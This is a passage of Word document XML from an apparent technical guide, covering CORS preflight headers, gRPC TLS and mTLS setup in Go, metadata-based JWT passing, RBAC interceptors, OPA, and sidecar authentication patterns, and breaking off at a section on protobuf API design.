    <w:p w14:paraId="4C5D3638" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Preflight request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF5D90A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Browser → API: OPTIONS /orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28940E2E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Headers: Origin: https://app.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F0C15E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">             Access-Control-Request-Method: POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79371800" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">             Access-Control-Request-Headers: Authorization, Content-Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A0A492" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD65686" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  API response (if allowed):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC21238" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Access-Control-Allow-Origin: https://app.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F41C962" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D782AE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Access-Control-Allow-Headers: Authorization, Content-Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBD0B07" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Access-Control-Max-Age: 86400 (cache preflight result for 24 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5CDFC4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C011BF9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Security: never use Access-Control-Allow-Origin: * with credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119AFB06" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    With credentials: must specify exact origin (not wildcard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019CC750" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Wildcard + credentials = any website can make authenticated requests as the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7696E907" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gRPC Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1676AEC1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621ACED8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Transport security (TLS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397E1F2B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  gRPC: TLS required for production (optional for local development)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367E8146" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E322D4D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5600B8C4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    creds, err := credentials.NewServerTLSFromFile("server.crt", "server.key")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BD1037" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    server := grpc.NewServer(grpc.Creds(creds))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14240618" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450A80CA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFB9675" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    creds, err := credentials.NewClientTLSFromFile("ca.crt", "")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C7CE82" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    conn, err := grpc.Dial(address, grpc.WithTransportCredentials(creds))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104A406C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9637FE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Mutual TLS (mTLS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEECD10" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Server authenticates client (not just client authenticating server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103DA4B9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E512BE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    config := &amp;tls.Config{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0CCC15" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      ClientAuth: tls.RequireAndVerifyClientCert,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FDF8EC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      ClientCAs:  clientCertPool,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654377E2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685B0692" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    creds := credentials.NewTLS(config)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0717F758" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D789873" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  mTLS in service mesh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567D576E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Istio: automatically provisions certificates for each pod (SPIFFE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21900721" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Envoy sidecar: terminates mTLS (application doesn't handle TLS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6E539B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Zero-trust: every service-to-service call authenticated with certificate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8A3A3F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="5DE97407" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Metadata (gRPC's equivalent of HTTP headers):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6015152C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Client sends metadata with every RPC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DA10A7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    md := metadata.Pairs(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBD9E12" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "authorization", "Bearer " + jwt,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28661CB7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "x-request-id", requestID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70685BD7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "x-trace-id", traceID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E982C42" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE6C235" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    ctx := metadata.NewOutgoingContext(ctx, md)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B54A30" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    response, err := client.GetOrder(ctx, request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EBF299" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C6A548" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Server reads metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BFA2DC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    md, ok := metadata.FromIncomingContext(ctx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D79462" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    tokens := md.Get("authorization")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6451DD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A55219" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Incoming (client → server) vs Outgoing (server → client):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264B2F26" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Server sets trailing metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5C82C6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      stream.SetTrailer(metadata.Pairs("x-rate-limit-remaining", "95"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5111A1B9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C760E19" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Authorization patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4807B165" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Role-Based Access Control (RBAC) in interceptor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2D4123" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    func AuthzInterceptor(ctx, req, info, handler) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6528C690" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      user := getUserFromContext(ctx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68565CE6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5436D48C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      requiredPermission := methodToPermission(info.FullMethod)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5684D567" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      if !user.HasPermission(requiredPermission) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FBA264" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        return nil, status.Errorf(codes.PermissionDenied,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1091A53B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">          "user %s lacks permission %s for %s",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7C862D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">          user.ID, requiredPermission, info.FullMethod)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A343999" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509286D6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      return handler(ctx, req)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204B9AEF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F83787A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B195E5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Open Policy Agent (OPA) for complex authorization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D04729" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Policies defined in Rego language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5546C8FC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Interceptor: sends {user, method, resource} to OPA → allow/deny decision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17994444" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Decouples: authorization policy from application code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDC9A93" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4322EA3F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Token validation (shared library):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D813BA5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  JWT validation in every service duplicates logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D9EABA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Better: dedicated auth service or shared library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300ECDD8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FB9D01" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Auth service (sidecar pattern):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C2F86B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Request arrives at service → sidecar validates JWT → passes user info in header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C0FE88" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Service: trusts X-User-ID header (never sees raw JWT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F18332" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4942DC32" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Problem: X-User-ID can be spoofed if caller bypasses sidecar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25064B7F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Solution: mTLS ensures only authorized services can call (no arbitrary HTTP clients)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8B1F19" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="62500D94">
          <v:rect id="_x0000_i6623" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D350BB9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. API Design — Protobuf Best Practices and API Versioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570FABF8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google's AIP (API Improvement Proposals)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F453B4A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Google's AIP provides an excellent framework for consistent gRPC API design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E003276" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189CDBFF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Resource-oriented design (AIP-121):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B07451" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Design around resources (like REST), not actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106B277D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D694A3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
